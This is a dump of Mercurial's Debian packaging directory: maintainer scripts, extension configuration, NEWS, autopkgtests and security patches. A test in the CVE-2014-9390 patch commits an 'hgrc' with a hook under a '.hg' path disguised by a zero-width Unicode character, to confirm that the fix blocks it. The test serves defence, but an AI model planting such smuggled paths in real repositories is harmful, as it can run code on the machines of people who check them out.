debian/0000775000000000000000000000000013375565254007207 5ustar debian/mercurial.links0000664000000000000000000000011112201757705012214 0ustar usr/share/doc/mercurial-common/examples usr/share/doc/mercurial/examples debian/mercurial.postrm0000664000000000000000000000322412201757705012430 0ustar #!/bin/sh # postrm script for mercurial # # see: dh_installdeb(1) set -e # summary of how this script can be called: # * `remove' # * `purge' # * `upgrade' # * `failed-upgrade' # * `abort-install' # * `abort-install' # * `abort-upgrade' # * `disappear' # # for details, see http://www.debian.org/doc/debian-policy/ or # the debian-policy package case "$1" in purge) for conffile in hgext.rc; do # we mimic dpkg as closely as possible, so we remove configuration # files with dpkg backup extensions too: ### Some of the following is from Tore Anderson: for ext in '~' '%' .bak .dpkg-tmp .dpkg-new .dpkg-old .dpkg-dist .ucf-old .ucf-new .ucf-dist; do rm -f /etc/mercurial/hgrc.d/$conffile$ext done # remove the configuration file itself rm -f /etc/mercurial/hgrc.d/$conffile # and finally clear it out from the ucf database if which ucf >/dev/null; then ucf --purge /etc/mercurial/hgrc.d/$conffile fi if which ucfr >/dev/null; then ucfr --purge mercurial /etc/mercurial/hgrc.d/$conffile fi done ;; remove|upgrade|failed-upgrade|abort-install|abort-upgrade|disappear) ;; *) echo "postrm called with unknown argument \`$1'" >&2 exit 1 ;; esac # dh_installdeb will replace this with shell code automatically # generated by other debhelper scripts. #DEBHELPER# exit 0 debian/hgrc0000664000000000000000000000011612216001776010036 0ustar # system-wide mercurial configuration file # See hgrc(5) for more information debian/hgext.rc0000664000000000000000000000545512201757705010654 0ustar # mercurial configuration file for bundled hg extensions # See hgrc(5) for more information # Extensions included in Mercurial listed in alphabetical order [extensions] # changeset access control # hgext.acl = # allow user-defined command aliases # hgext.alias = # provides the 'bookmarks' command # hgext.bookmarks = # bugzilla integration # requires python-mysqldb # hgext.bugzilla = # show the children of the given or working dir revision # provides the 'children' command # hgext.children = # graph count of revisions grouped by template # provides the 'churn' command # hgext.churn = # add color output to status, qseries, and diff-related commands # hgext.color = # converts a foreign SCM to a Mercurial one # provides the 'convert' and 'debugsvnlog' commands # requires: # - bzr to convert from Bazaar # - cvs to convert from CVS # - python-celementtree or python-elementtree to convert from Darcs # - git-core to convert from Git # - tla to convert from GNU Arch # - monotone to convert from Monotone # - python-subversion to convert from Subversion # hgext.convert = # external diff program support # hgext.extdiff = # pull and merge remote changes # provides the 'fetch' command # hgext.fetch = # GnuPG signing # provides the 'sign', 'sigcheck' and 'sigs' commands # requires gnupg # hgext.gpg = # show revision graphs in terminal windows # provides the 'glog' command # hgext.graphlog = # CIA notification hook # hgext.hgcia = # allows browsing the history of a repository in a graphical way # provides the 'view' command # requires wish # hgext.hgk = # syntax highlighting in hgweb # requires python-pygments # hgext.highlight = # lets you split a merge into pieces # provides the 'imerge' command # hgext.imerge = # inotify-based status acceleration for Linux systems # provides the 'inserve' command # hgext.inotify = # allows you to change changelog and summary text # hgext.interhg = # CVS/RCS-like keyword expansion # hgext.keyword = # quilt-like patch queues # provides the 'q*' commands # hgext.mq = # email notifications # hgext.notify = # display output using a pager # hgext.pager = # make it easy to refer to the parent of a revision # hgext.parentrevspec = # send changes as series of email patches # provides the 'email' command # hgext.patchbomb = # removes files not known to mercurial # provides the 'purge' command # hgext.purge = # moves sets of revisions to a different ancestor # provides the 'rebase' command # hgext.rebase = # interactive change selection during commit # provides the 'record' command # hgext.record = # patch transplanting tool # provides the 'transplant' command # hgext.transplant = # non-Unicode MBCS filename support # hgext.win32mbcs = # Unix/Mac/DOS line ending conversion utilities # hgext.win32text = # mDNS/DNS-SD (Zeroconf) support for 'hg serve' # hgext.zeroconf = debian/mercurial-common.install0000664000000000000000000000030012231045361014017 0ustar debian/tmp/usr/lib contrib/mq.el usr/share/emacs/site-lisp contrib/logo-droplets.svg usr/share/mercurial contrib/hgk usr/share/mercurial/ contrib/hg-ssh usr/bin debian/hgrc etc/mercurial/ debian/hgext.rc.md5sums0000664000000000000000000000012212201757705012232 0ustar 4c808ced6b7ddc2e3c1514703bc238b9 0.9.5-3 80086669df3007b5b17d7d12efe03775 sarge debian/mercurial-common.dirs0000664000000000000000000000005612216001775013326 0ustar usr/share/mercurial/help etc/mercurial/hgrc.d debian/mercurial-common.bash-completion0000664000000000000000000000004212216001775015444 0ustar contrib/bash_completion mercurial debian/README.source0000664000000000000000000000004712201757705011356 0ustar See /usr/share/doc/quilt/README.source debian/NEWS0000664000000000000000000001065312201757705007702 0ustar mercurial (1.4.3-1) unstable; urgency=low mercurial.el (emacs mode for mercurial) is not installed anymore in emacs paths. Emacs22 or newer has vc-hg.el that is better. If needed, this file is still provided in the examples directory. The alias extension does not exist anymore as its functionalities are now in mercurial core. To avoid spurious warning about failed loading of extension, users just have to remove it in their hgrc file. -- Vincent Danjean Mon, 15 Feb 2010 18:06:52 +0100 mercurial (1.1.2-1) unstable; urgency=low Since the 1.1.2-1 version, mercurial does not enable any extension by default anymore. Upstream asks us to do so because: - users can easily enable any extension if they wish, however they cannot disable a extension that have been enabled system-wide - upstream prefers that default Mercurial installation is the plain Mercurial without extension. -- Vincent Danjean Sat, 17 Jan 2009 17:47:06 +0100 mercurial (1.0-5) unstable; urgency=low Since the 1.0 version, mercurial handles most of the merges internaly. This is an upstream decision (see upstream changeset f077815932ce) that the debian package will follow. This means that : - there is no hgmerge script any more - programs that were invoked by hgmerge (kdiff3, ...) are not by default See http://www.selenic.com/mercurial/wiki/index.cgi/MergeToolConfiguration for configuring mergetools with mercurial 1.0 -- Vincent Danjean Tue, 20 May 2008 22:37:24 +0200 mercurial (1.0) unstable; urgency=low Since the 1.0 version, the hbisect extension is now provided as a built-in command. If you keep an older version of the hgext.rc file in /etc/mercurial/hgrc.d/ or a $HOME/.hgrc file with the extension enabled , mercurial will emit a warning: "failed to import extension hgext.hbisect: No module named hbisect". Just delete the hgext.hbisect entry in the hgext.rc and/or .hgrc file. -- Gerardo Curiel Wed, 02 Apr 2008 16:14:47 -0430 mercurial (0.9) unstable; urgency=low Since the 0.8.1-5 version, mercurial uses python2.4 instead of (currently the default on Debian system) python2.3. This allows tailor to use the hg backend (tailor requires python2.4). If someone really need python2.3 version of mercurial, please tell me (with reportbug for example). I will then split the package in python modules (default, 2.3, 2.4, ...) and one executable. Note: if you copied the hgwebdir.cgi or hgweb.cgi script from the examples directory, do not forget to update it so that it runs /usr/bin/python2.4 instead of /usr/bin/python (or recopy it) UPDATE since 0.9-6: Due to the new python policy, mercurial modules are now available for all supported python versions in debian (currently 2.3 and 2.4) -- Vincent Danjean Tue, 4 Jul 2006 00:53:21 +0200 mercurial (0.8) unstable; urgency=low Upgrade notes: - diff and status command are now repo-wide by default (use 'hg diff .' for the old behavior) - GPG signing is now done with the gpg extension - the --text option for commit, rawcommit, and tag has been removed - the copy/rename --parents option has been removed -- Vincent Danjean Mon, 30 Jan 2006 16:11:19 +0100 mercurial (0.6c-1) unstable; urgency=low Previous versions of mercurial can lead to conflicts for internal filenames if the repo has both a file 'foo' and a directory 'foo.d'. This version of mercurial solves this, however this means that some internal files have been renamed. If you want to use (commit, clone on same filesystem, ...) a repo created with an old version with the new version AND this repo contains directory nammed 'foo.d', then you need to deal with it. According to the upstream author, something like this should do the trick: find .hg -type d -name "*.[di]" -exec echo mv {} {}.hg ";" Run this at the top of your working dir. Take out the 'echo' once you've confirmed it's finding the right files. Also note that 0.6c and older clients should be perfectly compatible over the wire, so long as each side has the appropriate directory naming. But if you use 0.6c to pull into a repo created by 0.6b with changes that touch files in an affected directory, you're likely to have strange behavior. -- Vincent Danjean Tue, 23 Aug 2005 09:55:35 +0200 debian/mercurial.postinst0000664000000000000000000000252512216001775012765 0ustar #!/bin/sh # postinst script for mercurial # # see: dh_installdeb(1) set -e # summary of how this script can be called: # * `configure' # * `abort-upgrade' # * `abort-remove' `in-favour' # # * `abort-remove' # * `abort-deconfigure' `in-favour' # `removing' # # for details, see http://www.debian.org/doc/debian-policy/ or # the debian-policy package case "$1" in configure) for conffile in hgext.rc; do # Tell ucf that the file in /usr/share/mercurial is the latest maintainer # version, and let it handle how to manage the real configuration file in # /etc/mercurial/hgrc.d. ucf --sum-file /usr/share/mercurial/$conffile.md5sums --three-way \ /usr/share/mercurial/$conffile /etc/mercurial/hgrc.d/$conffile ucfr mercurial /etc/mercurial/hgrc.d/$conffile done ;; abort-upgrade|abort-remove|abort-deconfigure) ;; *) echo "postinst called with unknown argument \`$1'" >&2 exit 1 ;; esac # dh_installdeb will replace this with shell code automatically # generated by other debhelper scripts. #DEBHELPER# exit 0 debian/upstream-signing-key.pgp0000664000000000000000000001763412261306322013772 0ustar  O)Wy|!z=F-GQA UFlq2ydBZUD lml=x˺C I١8W!j2fy☙,'Rcq\|ON|b<זI 檥8঱]:{ה<0RW[ .F[Sz1~ӉK^fcnf{ X!Q Qf\>λ,bT$uuHwn`?j|Ձ`KDVZ-’ j3K*,mQvpP31DNRʰ}pĘ CwW H7wQO -£{<0x ZM rRljeu=W 4WmrGbb>ipj ^䆗vZ5O{u>D no<Cb 366r?]cS 1q!Matthew Mackall FO 9y*])2(q;mʈI]DTf=J Q~x /wMd@55@c57XpaOMgP&" Q #U'+Th=`,Tڃ ^{=ɱHbmٷi=Iٞ Wˏޓy[vsͼ۷a Rpp\%C Yչ!r Yqiȱ&-+EY&}me!}36W}Qⶔ{@*dYp+9CQĊrCğ~zFCՔRHWl{J(i^<wFIU-? =]ljO #2OdV{GOC,i,[xtq>-P]$=mj{{C >c~I'cPgfN 4CyۖjܠAf(RU籄l}=C. G _yCz1^ "Б$lIo,t5Lb %R8N-)3epђy yp͍OEi$̩PWP=eXߊõ\Ӥο/+Z{xyJT$Sc뉱-yblV!fGoJ"rbi6>aw(3l鑡<* 4MiisܪA eZflگ$R|P7Xֻl֫(Bt0U֏H@]>F9Z6h=0 pߡᙟÅr{8B, TZsӖ4ç4YOX l?yQޙ͉ͳUOq ܂J*'hڪAɍQ^TS6Mۣ$o:4sI ~>+<,-?a 5dp Q oBbKga>։,:b1Hv>-MRfr~` W69):~/ЇG9)6={Q޳WP kPzA0ëzY-X3ZyL/bRS>ؕB'\N 3܉Mk+<^\7! 'KČﺅ:2W8Yd 0$0eHV=Z\zlC=DԧCM]19 ce\+,ӱ˂spa4t\& XŻΒߺҔ7|&0~F.>hU{3"Ҿh7⇽0EI=42: Trxc[[miI~7G/ An ўJ99tLdK1, 8Dڀ؄ey:7t 42\B=? zbW}.Ǐ9郿E[{pW+C!-G NnNăfr ӽnE>ۈļvT:llKO PNٶz[+{sr- N515VM{+15IRMuֲ$(A'41'-!>va0,ׇJ$_/PeG\909).\s/b;%ȂpW(nxC̈́)Z+0Ee,LPl7~ u HOsBޯLxE ޥۄm$w; n_⁾Å2~9Y NT2Z{VgQB:X8痊4؛q pe%t#'8S_(7f(q`:._Y|U׷lk'vC<̃ }en3hD'8NP|>5+5#`%InQSy%,SY̝@Lt9pTShG $LklMˬj#co~Ĝs9‘MPC/oH QQ>nBiq%5ɫ&|OG v%EK2u7VKw9r_|gFsQWEC -_2&sa-fhCY8B-54K&ΞΜ&d.Ds`Jgbt!^fT}]y*m.Xw훓ή;5;C>sHݦ^o)Bpm90SV l@ ]X p& q+nm=V8釮hVGLUan׎UATTµz1RD2{JHؓO)㳣،9F yKBTpFc589 D4bMW"5Fċ+sA‹oрgşjC`msP5Nz%zmtZ ,Psj_H؇x % ~;$W@˝KE719i:툇lԿ)MO;7QTKwPOI@!" oAy ]ȱ;oWǥn/bǷOqnSW(f)AGg^Mbe+nby5-S'l'zZyEisiq$#)38njh4&КXMs NdbRps"۸JM+Mw+)hYM%uջ +~>}TIPG ƔgĐ.7;7)T {ЙHBEĔl-5G ORK嶛r 5O)?OMjr"&?hɚ(٩qQq|>q :wzFҕs_ޥG|>ã4[)/mc$4iɘ6\BՈF!imP,j'P2^B'Xi,OLX# I|(Igͧ`EDT'tExbz %<$BIy2<|r!y_@]%μh̤rٲj`zjJRZY19Dp̱ɖ$d1Ѫ6Hq{2ݥ4Y!Ď=Zc]5d_X/ d- +ϳ=4ts4 ZE)B\q8 XO0V_8^`ӬYY90 O  PNٶz[>>H`+SLa Sy.ُ l0dkt߈? wmJHt ͣT}^mVvHq[k[M X['Ue5&agʯ퀶jce(l^M eG$E<貐OĦa<@.6P6M궏pʈ41_w}9s.$4wحI;zf*#Y]٩?iRd핁E o49PM*']iOw75|\A{p`ϦV.qnt+7mVT3E?tO`_ƛg4qpCdOʠw#(>"h[3oQ;rEwgYYy= @d$Q|AH.h=%pd8B"4?֢D}fzd#/9"h )%0ǟ<]$we=$N@   QVx Eʩ*q{²ccjc)1t`ݷ-2X]n^;+ i]THo[Íe r;CrYYBG.iX{$  HkPfni;"CM6zRmٍǘ;bٜ[kDPLnI(D>_ԝA,wNs\Lt/`Xtضf|EʌN@7G*k5Cad!\Wfk:%μIAhs5WzV0.hI3yl~[ٻϹfsxni#U+y;q!l:KXEvdp29mk ]WmkQI i `_gϓ^ pp%9,>bO]./EC=R8׍(BFGsف Q/l$TVr,op^j #4(T=YB`3< 7ב.)" Q  V~&FԦh}M NviFZޒT8[c%eAp»}gAR3^9B`R1ul7OQ cheq`]Q=)PI&3ųxb]L'-b._wvoAV; < I+!2R'o .@Up:K(8DV-[cajnV0C?؎q+Ek䐅\uxΓ,f~?B-傫~-r1 IIuh$v!P405$){7 >\G̈́ݾs5Y/mxʼiP?N]'ͥ^yn$Uc^ ~~2e9-Iż't0BlFerNJbJI413C0Z'/Ħ ESdd*^9P7, Ñx_IC=geQO$ޥflW?q;`R 9_1}X ޙ=f.Y?siM0daUNҽ<:j"+8D 1h7;@{INξeх$}#u6LuoVoV-Ae\nB8#=WLƴFe" O)ˎ#(b`aT@@L\ dvkAG  1f7.3$p./GPӎ)z/_!J{4m iH$Sq L +3$x]ہ$?pyi^l'B",7&eJW'l=Q/%(>ZnO&t"HYa!aV9qjUV1 0TC,~ϖ-u@܏17 g. "scCqHPqݠ[ o* ^f=Jć%,T{U%Qk739K~'HXD@,X Dzk'AYR)7>)WNu5b)܍gyZ ̕N}aVa1`m~e0ZA7K*o=(dQ[_.~0wH\>Nz|z O)  Wh*-rߖNNy#%/rl>1*7)+z7&Ÿe3Wkth_$C|^R F܋ @>GYmH񞵤L71s+lIn:>ϻ*P*"'h?Rm/Weuư }L~VEPu q8;~<3nޱvp4d^M?q%Ytc=Sa9W5KD||[xE!"luy1&h~$>>.b/CF cFtgS77^F6s4QXR߁!b6ʾ(,iCuvIQԨ&&5T?c1 /*j˚> 4Z, &HM"FO7YB31E¶L_%3 F˜p8?R+v':yQo{ n|bac!W8udebian/tests/0000775000000000000000000000000012266004014010325 5ustar debian/tests/testsuite0000775000000000000000000000007512227057340012315 0ustar #!/bin/sh exec make tests TESTFLAGS="--with-hg=/usr/bin/hg" debian/tests/mercurial-git0000775000000000000000000000024012244566475013037 0ustar #!/bin/sh git init try cd try git config user.email babar@jungle.org echo a >a git add a git commit -m a cd .. exec hg --config extensions.git= clone try try2 debian/tests/control0000664000000000000000000000034412266004014011731 0ustar Tests: testsuite Depends: @, zip, unzip, netbase, python-subversion, monotone, cvs, bzr, tla, darcs Restrictions: allow-stderr #Tests: hgsubversion #Depends: @, hgsubversion Tests: mercurial-git Depends: @, mercurial-git, git debian/tests/hgsubversion0000775000000000000000000000017212233556050012777 0ustar #!/bin/sh exec hg --config extensions.hgsubversion= clone svn://anonscm.debian.org/python-apps/packages/mercurial/trunk/ debian/cacerts.hgrc0000664000000000000000000000026212201757705011467 0ustar [web] # user can disable this Debian default by overriding this option in ~/.hgrc # and/or using the --insecure command line switch cacerts = /etc/ssl/certs/ca-certificates.crt debian/README.Debian0000664000000000000000000000200412201757705011233 0ustar Mercurial for Debian -------------------- Table of contents * Documentation * Extensions provided in this package and their dependencies * Other extensions * Emacs support Documentation ************* Mercurial documentation is available on the web at: http://hgbook.red-bean.com/ and http://mercurial.selenic.com/wiki/ Extensions ********** Extensions can be enabled system-wide, per-user and/or per repository (see hgrc(5) for more information). Previous versions of this Debian package enabled some extensions by default; however, this is no longer the case. To enable extensions system-wide, you may edit the /etc/mercurial/hgrc.d/hgext.rc configuration file. This file also contains information on the dependencies of each extension. Emacs support ************* This package installs a mercurial.el file in the example directory (/usr/share/doc/mercurial/examples/). However, with emacs22 or better, vc-hg.el provided directly by emacs is better. This is why mercurial.el is not installed by default anymore. debian/mercurial.dirs0000664000000000000000000000003012216001776012031 0ustar usr/share/doc/mercurial debian/patches/0000775000000000000000000000000013375564052010631 5ustar debian/patches/CVE-2018-13348.patch0000664000000000000000000000165513373604506013343 0ustar # HG changeset patch # User Augie Fackler # Date 1524890536 14400 # Node ID 90a274965de74cb0b4bea01a564b29b12a6af814 # Parent c0081d3e1598e0c82cf5024422dc206db83687de mpatch: be more careful about parsing binary patch data (SEC) It appears to have been possible to trivially walk off the end of an allocated region with a malformed patch. Oops. Caught when writing an mpatch fuzzer for oss-fuzz. This defect is OVE-20180430-0001 or CVE-2018-13348. --- a/mercurial/mpatch.c +++ b/mercurial/mpatch.c @@ -303,7 +303,9 @@ static struct flist *decode(const char *bin, Py_ssize_t len) lt = l->tail; - while (pos >= 0 && pos < len) { + /* We check against len-11 to ensure we have at least 12 bytes + left in the patch so we can read our three be32s out of it. */ + while (pos >= 0 && pos < (len - 11)) { lt->start = getbe32(bin + pos); lt->end = getbe32(bin + pos + 4); lt->len = getbe32(bin + pos + 8); debian/patches/deb_specific__support_mo_in_fhs.patch0000664000000000000000000000066012231045361020212 0ustar Author: Vincent Danjean Description: Look for *.mo files in /usr/share/locale (FHS compliant) Forwarded: not-needed --- a/mercurial/i18n.py +++ b/mercurial/i18n.py @@ -15,7 +15,7 @@ else: module = __file__ base = os.path.dirname(module) -for dir in ('.', '..'): +for dir in ('.', '..', '/usr/share'): localedir = os.path.join(base, dir, 'locale') if os.path.isdir(localedir): break debian/patches/CVE-2014-9390.pt20000664000000000000000000000554012540341715012657 0ustar Backport of: Origin: c02a05cc6f5e661b09b0b0c65ec7bc874e161f9c (backport) # HG changeset patch # User Augie Fackler # Date 1418753297 18000 # Node ID c02a05cc6f5e661b09b0b0c65ec7bc874e161f9c # Parent 7a5bcd471f2ef302613b8551a79081d46d04be6e pathauditor: check for codepoints ignored on OS X Index: mercurial-2.8.2/mercurial/scmutil.py =================================================================== --- mercurial-2.8.2.orig/mercurial/scmutil.py +++ mercurial-2.8.2/mercurial/scmutil.py @@ -5,6 +5,7 @@ # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. +import encoding from i18n import _ from mercurial.node import nullrev import util, error, osutil, revset, similar, encoding, phases, parsers @@ -19,6 +20,9 @@ else: systemrcpath = scmplatform.systemrcpath userrcpath = scmplatform.userrcpath +def _lowerclean(s): + return encoding.hfsignoreclean(s.lower()) + def nochangesfound(ui, repo, excluded=None): '''Report no changes for push/pull, excluded is None or a list of nodes excluded from the push/pull. @@ -143,11 +147,11 @@ class pathauditor(object): raise util.Abort(_("path ends in directory separator: %s") % path) parts = util.splitpath(path) if (os.path.splitdrive(path)[0] - or parts[0].lower() in ('.hg', '.hg.', '') + or _lowerclean(parts[0]) in ('.hg', '.hg.', '') or os.pardir in parts): raise util.Abort(_("path contains illegal component: %s") % path) - if '.hg' in path.lower(): - lparts = [p.lower() for p in parts] + if '.hg' in _lowerclean(path): + lparts = [_lowerclean(p.lower()) for p in parts] for p in '.hg', '.hg.': if p in lparts[1:]: pos = lparts.index(p) Index: mercurial-2.8.2/tests/test-commit.t =================================================================== --- mercurial-2.8.2.orig/tests/test-commit.t +++ mercurial-2.8.2/tests/test-commit.t @@ -306,4 +306,21 @@ commit copy 0 0 6 ..... 0 26d3ca0dfd18 000000000000 000000000000 (re) 1 6 7 ..... 1 d267bddd54f7 26d3ca0dfd18 000000000000 (re) +verify pathauditor blocks evil filepaths + $ cat > evil-commit.py < from mercurial import ui, hg, context, node + > notrc = u".h\u200cg".encode('utf-8') + '/hgrc' + > u = ui.ui() + > r = hg.repository(u, '.') + > def filectxfn(repo, memctx, path): + > return context.memfilectx(path, '[hooks]\nupdate = echo owned') + > c = context.memctx(r, [r['tip'].node(), node.nullid], + > 'evil', [notrc], filectxfn, 0) + > r.commitctx(c) + > EOF + $ $PYTHON evil-commit.py + $ hg co --clean tip + abort: path contains illegal component: .h\xe2\x80\x8cg/hgrc (esc) + [255] + $ cd .. debian/patches/deb_specific__use_sensible-editor.patch0000664000000000000000000004102412261301466020424 0ustar Use sensible-editor as default instead of vi. --- a/hgeditor +++ b/hgeditor @@ -7,7 +7,7 @@ # only for Mercurial, modify this: case "${EDITOR}" in "") - EDITOR="vi" + EDITOR="sensible-editor" ;; emacs) EDITOR="$EDITOR -nw" --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -2095,8 +2095,8 @@ def debuginstall(ui): editor = ui.geteditor() cmdpath = util.findexe(editor) or util.findexe(editor.split()[0]) if not cmdpath: - if editor == 'vi': - ui.write(_(" No commit editor set and can't find vi in PATH\n")) + if editor == 'sensible-editor': + ui.write(_(" No commit editor set and can't find sensible-editor in PATH\n")) ui.write(_(" (specify a commit editor in your configuration" " file)\n")) else: --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -755,7 +755,7 @@ class ui(object): # avoid confusion. editor = 'E' else: - editor = 'vi' + editor = 'sensible-editor' return (os.environ.get("HGEDITOR") or self.config("ui", "editor") or os.environ.get("VISUAL") or --- a/i18n/da.po +++ b/i18n/da.po @@ -8752,7 +8752,7 @@ msgstr "" msgid "Checking commit editor...\n" msgstr "" -msgid " No commit editor set and can't find vi in PATH\n" +msgid " No commit editor set and can't find sensible-editor in PATH\n" msgstr "" msgid " (specify a commit editor in your configuration file)\n" @@ -13521,7 +13521,8 @@ msgstr "" msgid "" "``editor``\n" -" The editor to use during a commit. Default is ``$EDITOR`` or ``vi``." +" The editor to use during a commit. Default is ``$EDITOR`` or\n" +" ``sensible-editor``." msgstr "" msgid "" @@ -14194,7 +14195,7 @@ msgid "" " editor it uses is determined by looking at the environment\n" " variables HGEDITOR, VISUAL and EDITOR, in that order. The first\n" " non-empty one is chosen. If all of them are empty, the editor\n" -" defaults to 'vi'." +" defaults to 'sensible-editor'." msgstr "" msgid "" --- a/i18n/de.po +++ b/i18n/de.po @@ -13738,8 +13738,8 @@ msgid "checking commit editor...\n" msgstr "Prüfe Editor für Versionsmeldungen...\n" #: mercurial/commands.py:2093 -msgid " No commit editor set and can't find vi in PATH\n" -msgstr " Kein Editor für Versionsmeldungen angegeben und vi nicht im PATH\n" +msgid " No commit editor set and can't find sensible-editor in PATH\n" +msgstr " Kein Editor für Versionsmeldungen angegeben und sensible-editor nicht im PATH\n" #: mercurial/commands.py:2094 mercurial/commands.py:2098 msgid " (specify a commit editor in your configuration file)\n" @@ -20474,7 +20474,8 @@ msgstr "" #: mercurial/help/config.txt:1156 msgid "" "``editor``\n" -" The editor to use during a commit. Default is ``$EDITOR`` or ``vi``." +" The editor to use during a commit. Default is ``$EDITOR`` or\n" +" ``sensible-editor``." msgstr "" #: mercurial/help/config.txt:1159 @@ -21471,7 +21472,7 @@ msgid "" " editor it uses is determined by looking at the environment\n" " variables HGEDITOR, VISUAL and EDITOR, in that order. The first\n" " non-empty one is chosen. If all of them are empty, the editor\n" -" defaults to 'vi'." +" defaults to 'sensible-editor'." msgstr "" "EDITOR\n" " Manchmal muss Mercurial eine Textdatei in einem Editor öffnen, damit\n" @@ -21480,7 +21481,7 @@ msgstr "" " variablen HGEDITOR, VISUAL und EDITOR (in dieser Reihenfolge) " "ermittelt.\n" " Der erste nicht-leere wird verwendet. Wenn alle Angaben leer sind,\n" -" wird die Voreinstellung 'vi' verwendet." +" wird die Voreinstellung 'sensible-editor' verwendet." #: mercurial/help/environment.txt:99 msgid "" --- a/i18n/el.po +++ b/i18n/el.po @@ -274,7 +274,7 @@ msgid "" " editor it uses is determined by looking at the environment\n" " variables HGEDITOR, VISUAL and EDITOR, in that order. The first\n" " non-empty one is chosen. If all of them are empty, the editor\n" -" defaults to 'vi'." +" defaults to 'sensible-editor'." msgstr "" msgid "" @@ -6364,7 +6364,7 @@ msgstr "" msgid "Checking commit editor...\n" msgstr "" -msgid " No commit editor set and can't find vi in PATH\n" +msgid " No commit editor set and can't find sensible-editor in PATH\n" msgstr "" msgid " (specify a commit editor in your .hgrc file)\n" --- a/i18n/fr.po +++ b/i18n/fr.po @@ -299,7 +299,7 @@ msgid "" " editor it uses is determined by looking at the environment\n" " variables HGEDITOR, VISUAL and EDITOR, in that order. The first\n" " non-empty one is chosen. If all of them are empty, the editor\n" -" defaults to 'vi'." +" defaults to 'sensible-editor'." msgstr "" msgid "" @@ -8201,7 +8201,7 @@ msgstr "" msgid "Checking commit editor...\n" msgstr "" -msgid " No commit editor set and can't find vi in PATH\n" +msgid " No commit editor set and can't find sensible-editor in PATH\n" msgstr "" msgid " (specify a commit editor in your .hgrc file)\n" --- a/i18n/it.po +++ b/i18n/it.po @@ -7156,8 +7156,8 @@ msgstr "" msgid "Checking commit editor...\n" msgstr "Sto controllando l'editor per il commit...\n" -msgid " No commit editor set and can't find vi in PATH\n" -msgstr "Nessun editor per il commit trovato e non trovo vi in PATH\n" +msgid " No commit editor set and can't find sensible-editor in PATH\n" +msgstr "Nessun editor per il commit trovato e non trovo sensible-editor in PATH\n" msgid " (specify a commit editor in your configuration file)\n" msgstr "" @@ -10461,7 +10461,7 @@ msgid "" " editor it uses is determined by looking at the environment\n" " variables HGEDITOR, VISUAL and EDITOR, in that order. The first\n" " non-empty one is chosen. If all of them are empty, the editor\n" -" defaults to 'vi'." +" defaults to 'sensible-editor'." msgstr "" msgid "" --- a/i18n/ja.po +++ b/i18n/ja.po @@ -11954,8 +11954,8 @@ msgstr " (テンプレートのインス msgid "checking commit editor...\n" msgstr "メッセージ入力用エディタの確認中...\n" -msgid " No commit editor set and can't find vi in PATH\n" -msgstr " エディタが起動できません(vi にも PATH が通っていません)\n" +msgid " No commit editor set and can't find sensible-editor in PATH\n" +msgstr " エディタが起動できません(sensible-editor にも PATH が通っていません)\n" msgid " (specify a commit editor in your configuration file)\n" msgstr " (コミットログ用エディタを設定ファイルで設定してください)\n" @@ -18499,11 +18499,12 @@ msgstr "" msgid "" "``editor``\n" -" The editor to use during a commit. Default is ``$EDITOR`` or ``vi``." +" The editor to use during a commit. Default is ``$EDITOR`` or\n" +" ``sensible-editor``." msgstr "" "``editor``\n" " コミットログ入力用エディタ。 無指定の場合、 ``$EDITOR`` ないし\n" -" ``vi`` が使用されます。" +" ``sensible-editor`` が使用されます。" msgid "" "``fallbackencoding``\n" @@ -19662,7 +19663,7 @@ msgid "" " editor it uses is determined by looking at the environment\n" " variables HGEDITOR, VISUAL and EDITOR, in that order. The first\n" " non-empty one is chosen. If all of them are empty, the editor\n" -" defaults to 'vi'." +" defaults to 'sensible-editor'." msgstr "" "EDITOR\n" " コミットログ入力時のように、 エディタでファイルを開き、\n" @@ -19670,7 +19671,7 @@ msgstr "" " そこで使用されるエディタは、 HGEDITOR、 VISUAL\n" " あるいは EDITOR 環境変数に設定されたものを(この順序で)使用します。\n" " 最初の空で無い値に設定された環境変数の値を使用します。\n" -" いずれも未設定 (あるいは空) の場合は、 'vi' が使用されます。" +" いずれも未設定 (あるいは空) の場合は、 'sensible-editor' が使用されます。" msgid "" "PYTHONPATH\n" --- a/i18n/pt_BR.po +++ b/i18n/pt_BR.po @@ -12122,10 +12122,10 @@ msgstr " (modelos parecem ter sido insta msgid "checking commit editor...\n" msgstr "verificando editor para consolidação...\n" -msgid " No commit editor set and can't find vi in PATH\n" +msgid " No commit editor set and can't find sensible-editor in PATH\n" msgstr "" " Nenhum editor para consolidação configurado, e não foi possível encontrar " -"'vi' no PATH\n" +"'sensible-editor' no PATH\n" msgid " (specify a commit editor in your configuration file)\n" msgstr "" @@ -18837,10 +18837,12 @@ msgstr "" msgid "" "``editor``\n" -" The editor to use during a commit. Default is ``$EDITOR`` or ``vi``." +" The editor to use during a commit. Default is ``$EDITOR`` or\n" +" ``sensible-editor``." msgstr "" "``editor``\n" -" O editor usado durante um commit. O padrão é ``$EDITOR`` ou ``vi``." +" O editor usado durante um commit. O padrão é ``$EDITOR`` ou\n" +" ``sensible-editor``." msgid "" "``fallbackencoding``\n" @@ -20030,7 +20032,7 @@ msgid "" " editor it uses is determined by looking at the environment\n" " variables HGEDITOR, VISUAL and EDITOR, in that order. The first\n" " non-empty one is chosen. If all of them are empty, the editor\n" -" defaults to 'vi'." +" defaults to 'sensible-editor'." msgstr "" "EDITOR\n" " Algumas vezes o Mercurial precisa abrir em um editor um arquivo\n" @@ -20038,7 +20040,7 @@ msgstr "" " mensagens de consolidação. O editor usado é determinado pela\n" " consulta às variáveis de ambiente HGEDITOR, VISUAL e EDITOR,\n" " nessa ordem. O primeiro valor não vazio é escolhido. Se todos\n" -" estiverem vazios, o editor será o 'vi'." +" estiverem vazios, o editor será o 'sensible-editor'." msgid "" "PYTHONPATH\n" --- a/i18n/sv.po +++ b/i18n/sv.po @@ -9509,8 +9509,8 @@ msgstr " (mallar verkar vara inkorrekt i msgid "checking commit editor...\n" msgstr "kontrollerar arkiveringseditor...\n" -msgid " No commit editor set and can't find vi in PATH\n" -msgstr " Ingen arkiveringseditor satt och kan inte hitta vi i PATH\n" +msgid " No commit editor set and can't find sensible-editor in PATH\n" +msgstr " Ingen arkiveringseditor satt och kan inte hitta sensible-editor i PATH\n" msgid " (specify a commit editor in your configuration file)\n" msgstr " (specificera en arkiveringseditor i din konfigurationsfil)\n" @@ -14852,7 +14852,8 @@ msgstr "" msgid "" "``editor``\n" -" The editor to use during a commit. Default is ``$EDITOR`` or ``vi``." +" The editor to use during a commit. Default is ``$EDITOR`` or\n" +" 